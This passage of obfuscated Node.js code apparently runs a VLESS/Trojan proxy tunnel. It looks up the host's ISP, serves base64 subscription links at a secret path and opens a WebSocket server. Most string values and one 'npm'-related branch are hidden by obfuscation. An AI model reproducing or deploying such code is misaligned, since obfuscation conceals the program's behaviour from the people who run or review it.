_0x4b3294={_0x135d20:0x187,_0x313507:0xdb,_0x4d4612:0xe0,_0x314634:0xed,_0x2ffbdd:0x1ab,_0x3687f1:0x1a2,_0x560b3e:0x24e,_0x4ca9d4:0x1a1,_0x958974:0x1af,_0x5e8c72:0x1d7,_0x551d17:0x219,_0x2876d8:0x12f,_0x49392b:0x24a,_0x8e5cfc:0x1bb,_0x5c33ef:0x1dc,_0xe671c2:0x1de,_0x9cc2d2:0x18c,_0xf8395d:0x286,_0x5ce560:0x218,_0x712e6d:0x283,_0x525779:0x2b1,_0x129147:0x2b4,_0x4d499a:0x2e2,_0x18dd2a:0x25a,_0x5657b2:0x20d,_0x27366d:0x23d,_0x141fa0:0x276,_0xed9f02:0x199,_0x41e8d3:0x1a3,_0x1ba1ec:0x10d,_0x2aec4e:0xd6,_0x673a00:0x111,_0xb45ec:0x115,_0x2e18a5:0x15e,_0x4edb69:0x159,_0x587aab:0x1b6,_0x2746d4:0x1d3,_0x2e616b:0x1f4,_0x4c384c:0x1ee,_0x1375bd:0x252,_0xba7a8:0x132,_0x19ffc4:0x120,_0xa63aa8:0x14a,_0x2e93a7:0x1cf,_0x2b8b92:0x15b,_0x26ceda:0x125,_0x514a7c:0x1c4,_0x5ef464:0x1ce,_0x4fba0e:0x1e7,_0x2f514f:0x255,_0x2fe132:0x205,_0x4b0394:0x20b,_0x217fa2:0x246,_0x56842a:0x219},_0x4309f3={_0x539d11:0x1c,_0x59e9e2:0x364,_0xc744ff:0x3e},_0x16f6d6={_0x765769:0x135},_0x453e10={};function _0x4f2e8f(_0x1dbd3e,_0x364dd4,_0xda1166,_0x3935ca){return _0x421fd5(_0x1dbd3e-_0x16f6d6._0x765769,_0x364dd4,_0x1dbd3e-0x2b5,_0x3935ca-0x131);}_0x453e10[_0x4f2e8f(0x181,_0x4b3294._0x135d20,_0x4b3294._0x313507,_0x4b3294._0x4d4612)]=_0x4f2e8f(0x156,_0x4b3294._0x135d20,_0x4b3294._0x314634,_0x4b3294._0x2ffbdd),_0x453e10[_0x12530c(_0x4b3294._0x3687f1,_0x4b3294._0x560b3e,_0x4b3294._0x4ca9d4,0x151)]=_0x12530c(_0x4b3294._0x958974,_0x4b3294._0x5e8c72,_0x4b3294._0x551d17,_0x4b3294._0x2876d8),_0x453e10[_0x12530c(_0x4b3294._0x5e8c72,_0x4b3294._0x49392b,_0x4b3294._0x8e5cfc,_0x4b3294._0x5c33ef)]=function(_0x28c57d,_0x4e73da){return _0x28c57d===_0x4e73da;},_0x453e10[_0x4f2e8f(_0x4b3294._0xe671c2,0x176,0x12f,0x15a)]=_0x4f2e8f(0x137,0xd3,0x19f,_0x4b3294._0x9cc2d2),_0x453e10[_0x12530c(_0x4b3294._0xf8395d,_0x4b3294._0x5ce560,_0x4b3294._0x712e6d,_0x4b3294._0x525779)]='yhhab';function _0x12530c(_0x496fb1,_0x3d64d4,_0x48bbff,_0x3ce305){return _0x421fd5(_0x496fb1-_0x4309f3._0x539d11,_0x48bbff,_0x496fb1-_0x4309f3._0x59e9e2,_0x3ce305-_0x4309f3._0xc744ff);}_0x453e10[_0x12530c(_0x4b3294._0x129147,_0x4b3294._0x4d499a,0x257,_0x4b3294._0x18dd2a)]='Unknown';const _0x1e3abf=_0x453e10;try{const _0x18fdb5=await axios[_0x4f2e8f(_0x4b3294._0x5657b2,_0x4b3294._0x27366d,0x29a,_0x4b3294._0x141fa0)](_0x1e3abf['NqWsn']),_0x1d0ac1=_0x18fdb5[_0x4f2e8f(0x18f,0x178,_0x4b3294._0xed9f02,_0x4b3294._0x41e8d3)];ISP=(_0x1d0ac1[_0x4f2e8f(_0x4b3294._0x1ba1ec,_0x4b3294._0x2aec4e,_0x4b3294._0x673a00,_0x4b3294._0xb45ec)]+'-'+_0x1d0ac1['isp'])[_0x4f2e8f(_0x4b3294._0x2e18a5,_0x4b3294._0x4edb69,0xaf,0xb8)](/ /g,'_');}catch(_0xf33e78){_0x1e3abf[_0x4f2e8f(0x128,0x7b,0xa4,0x12e)](_0x1e3abf[_0x4f2e8f(_0x4b3294._0xe671c2,_0x4b3294._0x587aab,_0x4b3294._0x2746d4,_0x4b3294._0x2e616b)],_0x1e3abf[_0x4f2e8f(_0x4b3294._0x5e8c72,_0x4b3294._0x4c384c,_0x4b3294._0x1375bd,_0x4b3294._0xba7a8)])?(_0x3d4877[_0x4f2e8f(_0x4b3294._0x19ffc4,_0x4b3294._0x41e8d3,0x7d,_0x4b3294._0xa63aa8)]('npm',()=>{}),_0x2968df[_0x12530c(_0x4b3294._0x2e93a7,_0x4b3294._0x2b8b92,_0x4b3294._0x26ceda,_0x4b3294._0x514a7c)](_0x1e3abf[_0x12530c(0x230,_0x4b3294._0x5ef464,_0x4b3294._0x4fba0e,_0x4b3294._0x2f514f)],()=>{})):ISP=_0x1e3abf[_0x4f2e8f(_0x4b3294._0x2fe132,_0x4b3294._0x4b0394,_0x4b3294._0x217fa2,_0x4b3294._0x56842a)];}};GetISP();const httpServer=http[_0x279f0a(-0x177,-0xff,-0x18d,-0xea)]((_0x4ec3cd,_0x4c7dce)=>{const _0x117f26={_0x3f35fa:0x3f6,_0x4b9843:0x44b,_0x591d30:0x48f,_0x4f30bf:0x4a,_0x270f61:0xb8,_0xbfc406:0x4bd,_0x349c16:0x91,_0x6fa9ac:0x82,_0x3f49a6:0x79,_0x5a5415:0x489,_0x157a4e:0x411,_0x3bfacc:0x522,_0x18f59b:0x538,_0x57ca0d:0x82,_0xc79be8:0x26,_0x3f1980:0x42,_0x31328d:0x3f3,_0x2f5d23:0x555,_0x34903:0x420,_0x12dd47:0x4c5,_0x28215f:0x436,_0x4fa48e:0x4de,_0x26d053:0x521,_0x60882d:0x482,_0x2f0340:0x43c,_0x4c22de:0x3fc,_0x55b163:0x4b6,_0x2c12c4:0x3c6,_0x3904a3:0x3a5,_0x9ddbad:0x3d0,_0x50ba02:0x3ea,_0x1a3dbc:0x42f,_0x587993:0x38a,_0x2bd584:0x393,_0x5e663b:0x48d,_0x4d2fd9:0x20,_0x18cc2a:0x1a,_0x5ab8c1:0x25,_0x5b0215:0xac,_0x29c38f:0xc,_0x53552d:0x4b3,_0x26cc50:0x46d,_0x4af147:0x4bd,_0x52ed6e:0x416,_0x40696c:0x488,_0x3a6011:0x44e,_0x780771:0x42c,_0x37c1c4:0x450,_0x25e818:0x48d,_0x3f9326:0x37c,_0x33d750:0x4bd,_0x43b9b8:0x4c5,_0x4eb44d:0x2c,_0x5eb00d:0x4,_0x43d3c0:0x2a,_0xa18103:0x3df,_0x922c05:0x441,_0x4b2c81:0x39b,_0x16c20b:0x78,_0x14e8bb:0x7a,_0x3a6780:0x85,_0x3b964f:0x62,_0x438e22:0xc7,_0x5dee7e:0x4d,_0x370c0f:0x1e,_0x15fd14:0x8f,_0x22683b:0x105,_0x49ce43:0x5c,_0x15005f:0x68,_0x2931d7:0x46,_0x5d541b:0xe,_0x3e3f2b:0x53,_0x12bb67:0xcb,_0x1d77e2:0xff,_0x40ea78:0xdd,_0x3c7098:0x4c1,_0x195822:0x4d7,_0x26cc4f:0x500,_0x50a9ee:0x60,_0x4300a4:0x11e,_0x54ba8a:0x105,_0x282e73:0x74,_0x442001:0xb9,_0x21df12:0xfc,_0xca3f88:0x48a,_0x32ee7a:0x376,_0x59b562:0x431,_0x5ee7c3:0x4df,_0x598e71:0x40b,_0x5ae923:0x35b,_0x4dbfb8:0x47c,_0x48c95f:0x40f,_0x4f3cc2:0x4f4,_0x5ac238:0x445,_0x3d946e:0xbd,_0x54b045:0x96,_0x395a23:0x104,_0x3dda78:0x41f,_0x2b503a:0x46e,_0x2e6470:0x3c,_0x572d84:0x4e,_0x30ffa7:0xc4,_0x37f7cf:0x52,_0xd575f3:0x139,_0x47ac0e:0x3a7,_0x29184d:0x48b,_0x55f9b8:0x4b7,_0x527a7c:0x85,_0xfb30d6:0x1,_0x4e81be:0x70,_0x5b1942:0x97,_0x230197:0xe,_0x2bbdd5:0x22,_0x42140b:0x40,_0x512e43:0x65,_0x3a26d9:0x498,_0x79c61d:0x456,_0x17a4fe:0x4a8},_0x29b3c4={_0x1f0760:0x4b6,_0x8215f:0x578,_0x26899b:0x4be,_0x5052fc:0x532,_0x1dfe5c:0x529,_0x18eeed:0x556,_0x12f710:0x5ff,_0x56025b:0x59a,_0x49cce5:0x613,_0x36e02b:0x4fe,_0x2459e9:0x49e,_0x488abc:0x448,_0x3aa578:0x421,_0x914593:0x5e4,_0x410f44:0x61e},_0x443fa7={_0x13f069:0x133,_0x46c8d0:0x1c8,_0x21b4be:0x1b5},_0x3f5502={_0x40f258:0x15f,_0xcf3e48:0x60},_0x28c5ae={_0x501c56:0xf1,_0x3c47e9:0x585,_0x263106:0x188},_0x4a1896={_0x186d8c:0x197,_0x5d7e6e:0x157,_0x3e1bf5:0x1c},_0x6c3e96={};_0x6c3e96[_0x456d3e(_0x117f26._0x3f35fa,_0x117f26._0x4b9843,_0x117f26._0x591d30,0x38b)]=_0x445067(0xc8,0x54,-_0x117f26._0x4f30bf,_0x117f26._0x270f61),_0x6c3e96[_0x456d3e(_0x117f26._0xbfc406,0x4ac,0x41a,0x4a3)]=function(_0x3dafeb,_0x441b05){return _0x3dafeb===_0x441b05;};function _0x445067(_0x6aa1d8,_0x41b073,_0x11b91f,_0x5b4ee9){return _0x279f0a(_0x6aa1d8,_0x41b073-_0x4a1896._0x186d8c,_0x41b073-_0x4a1896._0x5d7e6e,_0x5b4ee9-_0x4a1896._0x3e1bf5);}_0x6c3e96['iltFV']=_0x445067(-_0x117f26._0x349c16,-0x4,_0x117f26._0x6fa9ac,-_0x117f26._0x3f49a6),_0x6c3e96[_0x456d3e(_0x117f26._0x5a5415,_0x117f26._0x157a4e,_0x117f26._0x3bfacc,_0x117f26._0x18f59b)]=_0x445067(0x94,_0x117f26._0x57ca0d,-_0x117f26._0xc79be8,_0x117f26._0x3f1980);function _0x456d3e(_0x795c63,_0x42dc9c,_0xbd80a3,_0x5591d9){return _0x279f0a(_0xbd80a3,_0x42dc9c-_0x28c5ae._0x501c56,_0x795c63-_0x28c5ae._0x3c47e9,_0x5591d9-_0x28c5ae._0x263106);}_0x6c3e96[_0x456d3e(0x4a2,_0x117f26._0x31328d,_0x117f26._0x2f5d23,0x467)]=function(_0x4b7cae,_0x50d56f){return _0x4b7cae+_0x50d56f;},_0x6c3e96[_0x456d3e(_0x117f26._0x34903,_0x117f26._0x12dd47,_0x117f26._0x28215f,0x3fd)]=_0x456d3e(_0x117f26._0x4fa48e,_0x117f26._0x26d053,_0x117f26._0x60882d,0x531),_0x6c3e96['hISyd']=function(_0x2933ec,_0x1dcd53){return _0x2933ec===_0x1dcd53;},_0x6c3e96[_0x456d3e(_0x117f26._0x2f0340,0x4bf,_0x117f26._0x4c22de,_0x117f26._0x55b163)]='AKDKN',_0x6c3e96['BcGEQ']=_0x456d3e(_0x117f26._0x2c12c4,_0x117f26._0x3904a3,_0x117f26._0x9ddbad,_0x117f26._0x50ba02),_0x6c3e96[_0x456d3e(_0x117f26._0x1a3dbc,_0x117f26._0x587993,_0x117f26._0x2bd584,_0x117f26._0x5e663b)]=_0x445067(0x6c,_0x117f26._0x4d2fd9,_0x117f26._0x18cc2a,-_0x117f26._0x4f30bf),_0x6c3e96[_0x445067(-_0x117f26._0x5ab8c1,0x6a,_0x117f26._0x5b0215,_0x117f26._0x29c38f)]=_0x456d3e(0x45a,_0x117f26._0x53552d,_0x117f26._0x26cc50,_0x117f26._0x31328d);const _0x2ddc35=_0x6c3e96;if(_0x2ddc35[_0x456d3e(_0x117f26._0x4af147,_0x117f26._0x52ed6e,_0x117f26._0x40696c,_0x117f26._0x3a6011)](_0x4ec3cd[_0x456d3e(_0x117f26._0x780771,_0x117f26._0x37c1c4,_0x117f26._0x25e818,_0x117f26._0x3f9326)],'/')){if(_0x2ddc35[_0x456d3e(_0x117f26._0x33d750,_0x117f26._0x43b9b8,0x49f,0x4d1)](_0x445067(-_0x117f26._0x4eb44d,-_0x117f26._0x5eb00d,-0x68,-_0x117f26._0x43d3c0),_0x2ddc35[_0x456d3e(_0x117f26._0xa18103,_0x117f26._0x922c05,_0x117f26._0x4b2c81,0x386)])){const _0x4fe68c=path['join'](__dirname,_0x445067(-_0x117f26._0x16c20b,-0x13,-_0x117f26._0x14e8bb,_0x117f26._0x3a6780));fs[_0x445067(-0x54,-_0x117f26._0x3b964f,-_0x117f26._0x438e22,-_0x117f26._0x5dee7e)](_0x4fe68c,_0x2ddc35['CMAQp'],(_0x5b266a,_0x56c4a8)=>{if(_0x5b266a){const _0x38f0d4={};_0x38f0d4[_0x26b8bc(_0x29b3c4._0x1f0760,_0x29b3c4._0x8215f,0x53e,_0x29b3c4._0x26899b)]=_0x2ddc35[_0x26b8bc(_0x29b3c4._0x5052fc,0x48f,_0x29b3c4._0x1dfe5c,_0x29b3c4._0x18eeed)],_0x4c7dce[_0x25b452(0x57e,_0x29b3c4._0x12f710,0x521,0x5ab)](-0x1*-0x26f+0x2*0x6fa+-0x2f*0x55,_0x38f0d4),_0x4c7dce['end'](_0x25b452(_0x29b3c4._0x56025b,_0x29b3c4._0x49cce5,_0x29b3c4._0x36e02b,0x4f7));return;}function _0x25b452(_0x3087b7,_0x21d993,_0x5115e4,_0x564fed){return _0x445067(_0x564fed,_0x3087b7-0x4c1,_0x5115e4-_0x3f5502._0x40f258,_0x564fed-_0x3f5502._0xcf3e48);}const _0x4fdd6f={};_0x4fdd6f[_0x25b452(_0x29b3c4._0x2459e9,0x4a8,_0x29b3c4._0x488abc,_0x29b3c4._0x3aa578)]=_0x2ddc35['kwqMJ'],_0x4c7dce[_0x26b8bc(_0x29b3c4._0x914593,0x60d,_0x29b3c4._0x410f44,0x6ac)](0x73*-0x10+0xd4*-0x2b+-0xae5*-0x4,_0x4fdd6f);function _0x26b8bc(_0x191d21,_0x36ab0a,_0x590718,_0x1c2cf6){return _0x456d3e(_0x590718-_0x443fa7._0x13f069,_0x36ab0a-_0x443fa7._0x46c8d0,_0x1c2cf6,_0x1c2cf6-_0x443fa7._0x21b4be);}_0x4c7dce['end'](_0x56c4a8);});return;}else throw _0xe43fda;}else{if(_0x2ddc35[_0x445067(_0x117f26._0x370c0f,_0x117f26._0x15fd14,0xa7,_0x117f26._0x22683b)](_0x4ec3cd[_0x445067(0x17,-0x2,-0x2b,-_0x117f26._0x49ce43)],'/'+SUB_PATH)){const _0x195798=NAME?NAME+'-'+ISP:ISP,_0x461d78='vless://'+UUID+'@'+DOMAIN+_0x445067(-_0x117f26._0x15005f,-_0x117f26._0x2931d7,-0x34,-_0x117f26._0x5d541b)+DOMAIN+'&fp=chrome&type=ws&host='+DOMAIN+_0x445067(_0x117f26._0x3e3f2b,_0x117f26._0x12bb67,_0x117f26._0x1d77e2,_0x117f26._0x40ea78)+WSPATH+'#'+_0x195798,_0x3f8b37='trojan://'+UUID+'@'+DOMAIN+':443?security=tls&sni='+DOMAIN+_0x456d3e(_0x117f26._0x3c7098,_0x117f26._0x195822,_0x117f26._0x26cc4f,_0x117f26._0x2f0340)+DOMAIN+_0x445067(_0x117f26._0x50a9ee,_0x117f26._0x12bb67,_0x117f26._0x4300a4,0xff)+WSPATH+'#'+_0x195798,_0x27fce2=_0x2ddc35['ACMcL'](_0x2ddc35[_0x445067(_0x117f26._0x54ba8a,_0x117f26._0x282e73,_0x117f26._0x442001,_0x117f26._0x21df12)](_0x461d78,'\x0a'),_0x3f8b37),_0x5c77cf=Buffer[_0x456d3e(0x424,_0x117f26._0xca3f88,0x43a,_0x117f26._0x32ee7a)](_0x27fce2)[_0x456d3e(_0x117f26._0x59b562,0x4d8,0x4e1,_0x117f26._0x5ee7c3)](_0x2ddc35['LtHwW']),_0x3f119e={};_0x3f119e[_0x456d3e(_0x117f26._0x598e71,_0x117f26._0x5ae923,_0x117f26._0x4dbfb8,_0x117f26._0x48c95f)]=_0x456d3e(0x44e,_0x117f26._0x4f3cc2,_0x117f26._0x5a5415,_0x117f26._0x5ac238),_0x4c7dce[_0x445067(0xbd,_0x117f26._0x3d946e,_0x117f26._0x54b045,_0x117f26._0x395a23)](-0x1727+-0x3*-0x4f+0x136*0x13,_0x3f119e),_0x4c7dce[_0x456d3e(0x3ee,0x4a2,_0x117f26._0x3dda78,_0x117f26._0x2b503a)](_0x5c77cf+'\x0a');}else{if(_0x2ddc35[_0x445067(-_0x117f26._0x2e6470,_0x117f26._0x572d84,_0x117f26._0x30ffa7,_0x117f26._0x37f7cf)](_0x2ddc35['YHXKx'],_0x2ddc35[_0x445067(0xbc,0xbe,0xa0,_0x117f26._0xd575f3)])){const _0x2638ce={_0x298bf8:0x655,_0x4fe592:0x69a,_0x2a1930:0x6b9,_0xa1f4a9:0x6f1},_0x5f3ee8={_0x547231:0x1e5,_0x4a6c9c:0x1a3,_0x440a21:0x1bd},_0x1a8e31=_0x5aad61?function(){function _0x3d1974(_0x2d790e,_0x4eaafa,_0x396208,_0x337e4b){return _0x456d3e(_0x2d790e-_0x5f3ee8._0x547231,_0x4eaafa-_0x5f3ee8._0x4a6c9c,_0x337e4b,_0x337e4b-_0x5f3ee8._0x440a21);}if(_0x6e8c2d){const _0x4e8013=_0x327c8b[_0x3d1974(_0x2638ce._0x298bf8,_0x2638ce._0x4fe592,_0x2638ce._0x2a1930,_0x2638ce._0xa1f4a9)](_0x2e54de,arguments);return _0x1bcad4=null,_0x4e8013;}}:function(){};return _0x579ffb=![],_0x1a8e31;}else{const _0x8a8a71={};_0x8a8a71[_0x456d3e(0x40b,_0x117f26._0x47ac0e,_0x117f26._0x29184d,_0x117f26._0x55f9b8)]=_0x2ddc35[_0x445067(_0x117f26._0x527a7c,_0x117f26._0xfb30d6,_0x117f26._0x4e81be,-0x95)],_0x4c7dce[_0x445067(_0x117f26._0x5b1942,0xbd,0x8c,_0x117f26._0x230197)](0x3*-0x287+-0x5*-0x73+0x6ea,_0x8a8a71),_0x4c7dce[_0x445067(-_0x117f26._0x2bbdd5,-_0x117f26._0x42140b,-0xa4,-_0x117f26._0x512e43)](_0x2ddc35[_0x456d3e(_0x117f26._0x3a26d9,_0x117f26._0x79c61d,0x476,_0x117f26._0x17a4fe)]);}}}}),_0x442ee1={};_0x442ee1[_0x279f0a(-0x19a,-0x1d0,-0x17b,-0x16a)]=httpServer;const wss=new WebSocket[(_0x421fd5(-0x1ba,-0x12b,-0x12c,-0xdd))](_0x442ee1),uuid=UUID[_0x421fd5(-0x134,-0x1cd,-0x157,-0x13f)](/-/g,''),DNS_SERVERS=[_0x421fd5(-0xbd,-0x62,-0xc0,-0x8d),_0x279f0a(-0x181,-0x18b,-0xf5,-0xea)];function resolveHost(_0x5d90b3){const _0x325c5d={_0x3e6274:0x406,_0x43adf1:0x39c,_0x4798c3:0x397,_0x1dfb85:0x333,_0xfcdad1:0x3a0,_0x23c14b:0x3f4,_0x52058b:0x5fe,_0x11df77:0x6f7,_0x3053be:0x689,_0x3c99f9:0x6f7,_0x592b9c:0x5e9,_0x4db029:0x570,_0x5a687b:0x552,_0x20cb85:0x531},_0x15d2a6={_0x21d116:0x77f,_0x2d352e:0x73f,_0x4c833d:0x614,_0x163469:0x63a,_0x3d4154:0x68b,_0x2e0244:0xd6,_0x109324:0x6f2,_0x227f90:0x673,_0x409507:0x651,_0x5257c6:0x623,_0x26c46e:0x208,_0x266ef3:0x102,_0x461b0a:0xc3,_0x2c43d5:0x676,_0x65b583:0x59e,_0x4c24e5:0x668,_0x4376b1:0x583,_0xf1bea:0x5d8,_0xa1cacc:0x603},_0x2e0a1c={_0x296520:0x281,_0x384d2a:0x374,_0x901f5f:0x2d3},_0x152b5d={_0x2427d6:0x2fd,_0x57f10a:0x31d,_0x2e6fe2:0x364},_0x21a39f={_0x517cfc:0x4f,_0x191500:0x9,_0x4f00a8:0x52},_0x1b1a2d={_0x2817e9:0xf6},_0x201113={_0x577dd6:0x10c,_0x1a8545:0xd4};function _0x22d2e2(_0x185dad,_0x248bce,_0x472a82,_0x2a63ce){return _0x421fd5(_0x185dad-_0x201113._0x577dd6,_0x2a63ce,_0x248bce-0x494,_0x2a63ce-_0x201113._0x1a8545);}function _0x5165de(_0x1fee6a,_0x1da339,_0x29f816,_0x1e078d){return _0x421fd5(_0x1fee6a-0x10f,_0x1fee6a,_0x29f816-0x72e,_0x1e078d-_0x1b1a2d._0x2817e9);}const _0x58471f={'NNZmy':function(_0x87e215){return _0x87e215();},'akMhd':_0x22d2e2(_0x325c5d._0x3e6274,_0x325c5d._0x3e6274,_0x325c5d._0x43adf1,_0x325c5d._0x4798c3),'GkJNX':function(_0x3900db,_0x1bcadf){return _0x3900db===_0x1bcadf;},'QJxdE':function(_0x9b18d6,_0x250dfa){return _0x9b18d6===_0x250dfa;},'zaeOz':'uCDud','CRJJJ':function(_0x44b181,_0x16d5a3){return _0x44b181===_0x16d5a3;},'cGyiG':function(_0x424691,_0x55517e){return _0x424691(_0x55517e);},'YYqhH':_0x22d2e2(_0x325c5d._0x1dfb85,_0x325c5d._0xfcdad1,_0x325c5d._0x23c14b,0x307),'DKVFG':_0x5165de(_0x325c5d._0x52058b,_0x325c5d._0x11df77,_0x325c5d._0x3053be,_0x325c5d._0x3c99f9),'GRyvP':_0x5165de(_0x325c5d._0x592b9c,_0x325c5d._0x4db029,_0x325c5d._0x5a687b,_0x325c5d._0x20cb85),'QQPqT':function(_0x193840,_0x2513cf){return _0x193840(_0x2513cf);}};return new Promise((_0x59c3ea,_0x171733)=>{const _0x31a860={_0x2cb2c1:0x2d,_0x36eece:0x34,_0x5b3022:0xbc,_0x5d54d3:0xd5,_0x167e23:0x404,_0x839160:0x306,_0x763673:0x38e,_0x110339:0x21,_0x1b5039:0x92,_0x1c7a05:0x2e7,_0x19958e:0x3c2,_0x465796:0x31d,_0x46bdae:0x34a,_0x5cdda4:0x326,_0x5c9d9a:0x2c1,_0x46457d:0x2ba,_0x463bc4:0x3e,_0x2ab011:0x3,_0x42e0b2:0x36,_0x3ba5de:0xb1,_0x31b61f:0x65,_0x4aab69:0x38,_0x2e10e4:0x2ea,_0x5ac976:0x2d6,_0x5742f2:0x263,_0x45e65f:0x9f,_0x1a9fa9:0x54,_0x1a2f69:0x1e,_0x13c64c:0xb7,_0x11f041:0x3d5,_0x369f20:0x396,_0x465f03:0x3eb,_0x225569:0x35d,_0x30b483:0x3e6,_0x3495d3:0x434,_0x1549f7:0x3b5,_0x8b2a2:0x36c,_0x547fd9:0x31,_0x290d5f:0xc6,_0x164781:0x11,_0x4b9279:0x50,_0x1030b4:0x4a9,_0x1bdf9d:0x3e5},_0xfdc0e4={_0x3c45c6:0x19c,_0x5c20b8:0x203,_0x4e9469:0x21a,_0x5704d3:0x232,_0x3c44fc:0x233,_0xf1a9ae:0x20b,_0x97dcc1:0x22d,_0xc0d885:0x19d,_0x1cbfdf:0x184,_0x3dc0c0:0x193,_0x1298a5:0x180,_0x3555ef:0xbb,_0x61ebd:0xed,_0x435cd2:0x127,_0x2078af:0x2bd,_0x426c2b:0x16c,_0x1d5ede:0x21f,_0x4c9bd1:0x157,_0x48cc31:0x16e,_0xef3470:0x1c2,_0x1b8b38:0x1df,_0x4fcdb9:0x247,_0x3a87f1:0x19f,_0x4fea6c:0x1bb,_0x451e91:0x176,_0x450662:0x1dc,_0x43e5dd:0x234,_0x374783:0xf4,_0x41d2b6:0x185,_0x11356a:0x1b1,_0x25f043:0x186,_0x49b1c4:0x1a3,_0x3568e4:0x26f,_0x22a95d:0x1c8,_0x1ddc04:0x1d1,_0x519078:0x265,_0x216c0b:0x149,_0x328c08:0x27f,_0x3345ab:0x1ca,_0x1c09d3:0x1fb,_0x296491:0x201,_0x497461:0x1f9,_0x18426f:0x179,_0x3f3015:0xf3,_0x5a503b:0x173,_0x478b21:0x1d1,_0x5ae2e3:0x1fc,_0x248aa4:0x1ea,_0x237db4:0x1c9,_0x1a38ca:0x158,_0x3be0eb:0x225,_0xa6aa68:0x10b,_0x31edb1:0xe2,_0x2b5f1a:0x189,_0x243c32:0x11d,_0x42626b:0x254,_0x2548a3:0x118,_0x408637:0xf6,_0x2def65:0x13d,_0x25b597:0x2e1,_0x336ebd:0x233,_0x5c8128:0x233,_0x81f1e0:0x286,_0x5a47be:0x29d,_0x2b957d:0x299,_0x542b15:0x260,_0x5f6a96:0x23d,_0x2f8bf9:0x36f,_0x48f04a:0x292,_0x4bd40f:0x2cc},_0x3d5187={_0x52ceb0:0x35,_0x81c27d:0xfd,_0x4d2dbf:0x27c},_0x4045e4={_0x51415e:0x21e,_0x525ee0:0x1a7,_0x4d3e73:0x16c},_0x48da4c={_0x1987e1:0x2,_0x41c5e2:0x35,_0x329fda:0x83},_0x2dd623={_0x357afd:0x8a,_0x154171:0x469,_0x4fe619:0x11b},_0x12008e={_0x87949b:0x362,_0x5a4e02:0x40e,_0x54bd7b:0x485},_0x183d5f={_0x2d309b:0x1a7,_0x454843:0x56},_0x3769c1={_0x2e5e7f:0xbb,_0x10d132:0xfe,_0x4ec1fc:0x1a5},_0x5927f5={_0x1fc192:0x87,_0x203184:0x2e6};function _0xcb92c6(_0x4fccae,_0x19c061,_0x14bcdf,_0xef0783){return _0x22d2e2(_0x4fccae-_0x5927f5._0x1fc192,_0x14bcdf-_0x5927f5._0x203184,_0x14bcdf-0xf,_0xef0783);}const _0x1f922b={'LtVrZ':function(_0x204d0c){const _0x24bdd2={_0x42d562:0x1c8};function _0x573f0d(_0x1e6d76,_0x2fd542,_0x3fa755,_0x23deb5){return _0x84e0(_0x3fa755- -_0x24bdd2._0x42d562,_0x1e6d76);}return _0x58471f[_0x573f0d(_0x21a39f._0x517cfc,_0x21a39f._0x191500,_0x21a39f._0x4f00a8,0xe9)](_0x204d0c);},'SdFFN':function(_0x5bbea4,_0x224bad){return _0x5bbea4+_0x224bad;},'AIhMB':_0x58471f[_0xcb92c6(0x6d3,_0x15d2a6._0x21d116,0x6cd,_0x15d2a6._0x2d352e)],'ApkRh':function(_0x460540,_0x4e2f7e){const _0x587ed3={_0x54d024:0xce};function _0x54925c(_0x57c3e2,_0x5185e8,_0x367305,_0x40f203){return _0xcb92c6(_0x57c3e2-0x108,_0x5185e8-_0x587ed3._0x54d024,_0x367305- -0x6ac,_0x57c3e2);}return _0x58471f[_0x54925c(-0x158,-_0x3769c1._0x2e5e7f,-_0x3769c1._0x10d132,-_0x3769c1._0x4ec1fc)](_0x460540,_0x4e2f7e);},'yDfxZ':function(_0xd36ba6,_0x151ab8){return _0xd36ba6>_0x151ab8;},'qpCmS':function(_0x23d96a,_0x50d375){const _0x202ddc={_0x4fc6f8:0x2,_0x3ed332:0x38f};function _0x545ffc(_0x4afb25,_0xf34e1e,_0x262552,_0x3d7afc){return _0xcb92c6(_0x4afb25-_0x202ddc._0x4fc6f8,_0xf34e1e-0x16a,_0xf34e1e- -_0x202ddc._0x3ed332,_0x3d7afc);}return _0x58471f[_0x545ffc(_0x152b5d._0x2427d6,_0x152b5d._0x57f10a,_0x152b5d._0x2e6fe2,0x281)](_0x23d96a,_0x50d375);},'kgAwj':_0x58471f[_0xcb92c6(_0x15d2a6._0x4c833d,0x638,_0x15d2a6._0x163469,_0x15d2a6._0x3d4154)],'AbGMQ':function(_0x474ec1,_0xf9cc83){return _0x58471f['CRJJJ'](_0x474ec1,_0xf9cc83);},'gmbKw':function(_0xee1bb5,_0x1ab97c){function _0x5e9245(_0x50e134,_0x4349f4,_0x1e9a83,_0x1e4f99){return _0x195451(_0x1e4f99-0x458,_0x4349f4,_0x1e9a83-_0x183d5f._0x2d309b,_0x1e4f99-_0x183d5f._0x454843);}return _0x58471f[_0x5e9245(_0x2e0a1c._0x296520,_0x2e0a1c._0x384d2a,0x23e,_0x2e0a1c._0x901f5f)](_0xee1bb5,_0x1ab97c);},'xxqmp':_0x58471f[_0x195451(-0xe5,-0x65,-_0x15d2a6._0x2e0244,-0x32)]};if(/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/[_0xcb92c6(_0x15d2a6._0x109324,_0x15d2a6._0x227f90,_0x15d2a6._0x409507,_0x15d2a6._0x5257c6)](_0x5d90b3)){if(_0x58471f['QJxdE'](_0x58471f['DKVFG'],_0x58471f[_0x195451(-0x164,-_0x15d2a6._0x26c46e,-_0x15d2a6._0x266ef3,-_0x15d2a6._0x461b0a)])){const _0x5858a9={_0x48e922:0x3,_0x2782a4:0x45},_0x28fecb=_0x335d8b?function(){function _0x1a377e(_0x30e4ea,_0x5cd2e2,_0x3125c3,_0x217c0c){return _0x195451(_0x3125c3-0x508,_0x30e4ea,_0x3125c3-_0x5858a9._0x48e922,_0x217c0c-_0x5858a9._0x2782a4);}if(_0x3ed755){const _0x2aacbe=_0x4d4b63[_0x1a377e(0x36c,_0x12008e._0x87949b,_0x12008e._0x5a4e02,_0x12008e._0x54bd7b)](_0x19bccf,arguments);return _0x4d3954=null,_0x2aacbe;}}:function(){};return _0x56493c=![],_0x28fecb;}else{_0x58471f[_0xcb92c6(_0x15d2a6._0x2c43d5,_0x15d2a6._0x65b583,0x5c7,0x5c4)](_0x59c3ea,_0x5d90b3);return;}}function _0x195451(_0x2226de,_0x1811a0,_0x44fb18,_0x589772){return _0x22d2e2(_0x2226de-_0x2dd623._0x357afd,_0x2226de- -_0x2dd623._0x154171,_0x44fb18-_0x2dd623._0x4fe619,_0x1811a0);}let _0x39d88d=-0x1eb2*0x1+0x9b6+0x14fc;function _0x5f13d5(){const 